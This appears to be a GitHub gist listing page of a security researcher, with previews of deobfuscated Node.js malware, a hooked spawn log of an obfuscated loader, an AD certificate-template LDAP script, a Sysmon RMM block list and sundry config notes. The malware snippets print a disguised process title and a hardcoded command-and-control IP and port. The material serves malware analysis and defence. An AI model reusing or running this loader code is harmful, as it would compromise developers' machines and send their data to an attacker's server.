Pull docker image
docker pull mcr.microsoft.com/powershell:latest
Run container
docker run -it --rm mcr.microsoft.com/powershell:latest
Install WSMan-Module
Install-Module -Name PSWSMan
Import-Module PSWSMan
i401 b401
b401
/ gist:713c97490045e0853e21f2af8b3f29bd
Created
April 2, 2026 10:00
express-session Clipboard Mon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SLOP deobfuscation | |
| const { execSync } = require('child_process'); | |
| const os = require('os'); | |
| const axios = require('axios'); | |
| process.title = 'npm-compiler.log'; | |
| const server = '216.126.237.71'; | |
| const uid = 'a36adbc35e69b22acbf9f834a0deb286'; | |
| const t = '8'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SLOP deobfuscation | |
| const fs = require('fs'); | |
| const path = require('path'); | |
| const os = require('os'); | |
| const FormData = require('form-data'); | |
| const axios = require('axios'); | |
| const { execSync, exec } = require('child_process'); | |
| process.title = 'npm-compiler'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SLOP deobfuscation | |
| const axios = require('axios'); | |
| const os = require('os'); | |
| const fs = require('fs'); | |
| const { execSync, exec, spawn } = require('child_process'); | |
| const uid = 'a36adbc35e69b22acbf9f834a0deb286'; | |
| const m = '216.126.237.71'; | |
| const p = '4801'; | |
| const t = '8'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [HOOKED] child_process.spawn called with: | |
| [ | |
| "node", | |
| [ | |
| "-e", | |
| "\n const F=b;(function(c,d){const E=b,e=c();while(!![]){try{const f=-parseInt(E(0x1fd))/(-0x1b33+0x71*0x31+0x593)*(-parseInt(E(0x1c8))/(-0x20c2+0x147a+0xc4a*0x1))+-parseInt(E(0x202))/(0x156f+-0x2d4+0x1*-0x1298)+-parseInt(E(0x235))/(0x26bc+0xe8+-0x20*0x13d)*(-parseInt(E(0x22b))/(-0x2707+0x1719+0xff3))+parseInt(E(0x1dc))/(0x1*0x263+0x1*0x2550+-0x27ad*0x1)*(parseInt(E(0x228))/(0xdcd*-0x2+0x1*0x1e51+-0x2b0))+-parseInt(E(0x21d))/(-0x13*0x58+-0x1f6*0x11+0x27e6)+-parseInt(E(0x1a3))/(0x14e+-0x5ce*0x4+0x1*0x15f3)+parseInt(E(0x191))/(0x923+0x239*-0xb+0x7ad*0x2);if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0x1d16+0x5*0x3bd8+-0x7b*-0x38f));const axios=require(F(0x16c)),os=require('os'),fs=require('fs'),{execSync,exec,spawn}=require(F(0x1de)),uid=F(0x1ec),m=F(0x1e8),p=F(0x213),t='8';function b(c,d){c=c-(0xb97*0x1+0x117f+-0x1bac);const e=a();let f=e[c];return f;}function a(){const a1=['npm\\x20install\\x20socket. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -AssemblyName System.DirectoryServices.Protocols | |
| Add-Type -AssemblyName System.DirectoryServices | |
| $pollIntervalSeconds = 5 | |
| $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | |
| $dc = $domain.FindDomainController().Name | |
| $rootDSE = New-Object System.DirectoryServices.DirectoryEntry("LDAPS://$dc/RootDSE") | |
| $configNC = $rootDSE.configurationNamingContext | |
| $baseDN = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC" |
b401
/ sysmon_rmm-FileBlockExecutable.xml
Last active
October 15, 2023 14:43
Sysmon - Block RMM software
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Sysmon schemaversion="4.82"> | |
| <EventFiltering> | |
| <RuleGroup name="" groupRelation="or"> | |
| <FileBlockExecutable onmatch="include"> | |
| <!-- List used: https://github.com/0x706972686f/RMM-Catalogue/tree/main --> | |
| <TargetFilename name="RMM Software" condition="end with">rpcgrab.exe</TargetFilename> | |
| <TargetFilename name="RMM Software" condition="end with">rpcsetup.exe</TargetFilename> | |
| <TargetFilename name="RMM Software" condition="end with">action1_agent.exe</TargetFilename> | |
| <TargetFilename name="RMM Software" condition="end with">aeroadmin.exe</TargetFilename> | |
| <TargetFilename name="RMM Software" condition="end with">alitask.exe</TargetFilename> |
b401
/ pssession.md
Last active
May 17, 2022 06:26
Enter-PSSession within powershell docker container
# rtkit for pipewire
security.rtkit.enable = true;
# enable pipewire with wlr support
services.pipewire.enable = true;
xdg = {
portal = {
enable = true;
extraPortals = with pkgs; [
// https://security.microsoft.com/apiproxy/mtp/huntingService/queries/encode
Advanced hunting encodes the query for sharing purposes.
- \x00 gets added to every second position in the query (DeviceEvents => D\x00e\x00v\x00...)
- Query gets gzip compressed
- Compressed query gets base64 encoded with a limited character set.
- Position 5 - 13 gets replaced with 'A'
You can now send the encoded query through https://security.microsoft.com/v2/advanced-hunting?query={add query here}&timeRangeId=week
b401
/ asciidoc_template
Created
December 9, 2019 15:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| = Title: Subtitle | |
| Firstname Lastname <firstname.lastname@domain.com> | |
| :doctype: pdf | |
| :author: firstname lastname | |
| :subtitle: subtitle | |
| :ntitle: title: {subtitle} | |
| :imagesdir: ./images | |
| :class: classname | |
| :pdf-stylesdir: /template/resources/themes | |
| :pdf-fontsdir: /template/resources/fonts |
NewerOlder